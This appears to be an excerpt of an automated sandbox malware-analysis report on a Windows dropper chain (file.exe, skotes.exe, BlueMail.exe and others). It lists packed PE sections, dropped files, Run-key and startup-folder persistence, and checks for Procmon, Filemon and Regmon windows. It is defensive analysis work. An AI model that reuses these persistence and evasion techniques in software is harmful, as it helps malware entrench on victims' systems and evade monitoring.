Source: skotes.exe.0.dr	Static PE information: section name: isvciprd
Source: skotes.exe.0.dr	Static PE information: section name: bfywzfjw
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: .idata
Source: random[1].exe1.12.dr	Static PE information: section name:
Source: random[1].exe1.12.dr	Static PE information: section name: pbmurklf
Source: random[1].exe1.12.dr	Static PE information: section name: kltrprsa
Source: random[1].exe1.12.dr	Static PE information: section name: .taggant
Source: 8f25543307.exe.12.dr	Static PE information: section name:
Source: 8f25543307.exe.12.dr	Static PE information: section name: .idata
Source: 8f25543307.exe.12.dr	Static PE information: section name:
Source: 8f25543307.exe.12.dr	Static PE information: section name: pbmurklf
Source: 8f25543307.exe.12.dr	Static PE information: section name: kltrprsa
Source: 8f25543307.exe.12.dr	Static PE information: section name: .taggant
Source: random[2].exe0.12.dr	Static PE information: section name:
Source: random[2].exe0.12.dr	Static PE information: section name: .idata
Source: random[2].exe0.12.dr	Static PE information: section name:
Source: random[2].exe0.12.dr	Static PE information: section name: zzjczccs
Source: random[2].exe0.12.dr	Static PE information: section name: kizckzqk
Source: random[2].exe0.12.dr	Static PE information: section name: .taggant
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name:
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name: .idata
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name:
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name: zzjczccs
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name: kizckzqk
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name: .taggant
Source: random[3].exe.12.dr	Static PE information: section name:
Source: random[3].exe.12.dr	Static PE information: section name: .idata
Source: random[3].exe.12.dr	Static PE information: section name: ywoaerci
Source: random[3].exe.12.dr	Static PE information: section name: srexvxqu
Source: random[3].exe.12.dr	Static PE information: section name: .taggant
Source: 9ffcf1ab77.exe.12.dr	Static PE information: section name:
Source: 9ffcf1ab77.exe.12.dr	Static PE information: section name: .idata
Source: 9ffcf1ab77.exe.12.dr	Static PE information: section name: ywoaerci
Source: 9ffcf1ab77.exe.12.dr	Static PE information: section name: srexvxqu
Source: 9ffcf1ab77.exe.12.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1D91C push ecx; ret	0_2_00E1D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E11359 push es; ret	0_2_00E1135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_0037D91C push ecx; ret	7_2_0037D92F
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A73F9D pushfd ; retf	14_2_05A73F9E
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A74159 push FFFFFF9Dh; retf	14_2_05A74164
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A75159 push FFFFFF8Dh; retf	14_2_05A75164
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A742E1 pushfd ; retf	14_2_05A74289
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A74035 pushfd ; retf	14_2_05A74036
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A7420B pushfd ; retf	14_2_05A74224
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A73C68 pushad ; iretd	14_2_05A73C89
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A7427E pushfd ; retf	14_2_05A74289
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A74459 push FFFFFF9Ah; retf	14_2_05A74464
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_05A75859 push FFFFFF86h; retf	14_2_05A75864
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_0604D9C1 push 7805E7F7h; iretd	14_2_0604D9CD
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_06060250 push es; ret	14_2_06060260
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_0606B2B1 push es; ret	14_2_0606B2CC
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_0606B2CD push es; ret	14_2_0606B2CC
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060EA5D9 push es; iretd	14_2_060EA60C
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060EC219 push es; ret	14_2_060EC218
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060EC1C3 push es; ret	14_2_060EC218
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060E3A05 push es; retf	14_2_060E3A08
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060EFAC8 push es; iretd	14_2_060EFB00
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060EFB15 push es; retf	14_2_060EFB28
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_060E39F6 push es; retf	14_2_060E3A04
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Code function: 14_2_0617061C push esp; ret	14_2_0617061D
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: 15_2_00B1306E push ecx; ret	15_2_00B13081
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0078647C push esp; ret	17_2_0078649B
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_00788E2D push ecx; retf	17_2_00788E33
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_007862E3 push ebp; iretd	17_2_007862EE
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0078A0C3 push 64111D25h; ret	17_2_0078A113
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Code function: 17_2_0078A098 pushad ; ret	17_2_0078A0C2

Source: file.exe	Static PE information: section name: entropy: 7.044916136043747
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.044916136043747
Source: BlueMail[1].exe.12.dr	Static PE information: section name: .text entropy: 7.98422959535378
Source: BlueMail.exe.12.dr	Static PE information: section name: .text entropy: 7.98422959535378
Source: random[1].exe1.12.dr	Static PE information: section name: pbmurklf entropy: 7.940949989172242
Source: 8f25543307.exe.12.dr	Static PE information: section name: pbmurklf entropy: 7.940949989172242
Source: random[2].exe0.12.dr	Static PE information: section name: zzjczccs entropy: 7.955535005622198
Source: 9f2ded7baa.exe.12.dr	Static PE information: section name: zzjczccs entropy: 7.955535005622198
Source: random[3].exe.12.dr	Static PE information: section name: entropy: 7.73176336817548
Source: 9ffcf1ab77.exe.12.dr	Static PE information: section name: entropy: 7.73176336817548
Source: vmwin.exe.14.dr	Static PE information: section name: .text entropy: 7.98422959535378

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	File created: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014886001\994907c116.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\BlueMail[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File created: C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014885001\5eff75a611.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014884001\9ffcf1ab77.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File created: C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	File created: C:\Users\user\AppData\Local\Temp\vmwin.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 75e257f622.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9ffcf1ab77.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9f2ded7baa.exe	Jump to behavior

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 75e257f622.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 75e257f622.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9f2ded7baa.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9f2ded7baa.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9ffcf1ab77.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9ffcf1ab77.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

17_2_0081C858

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
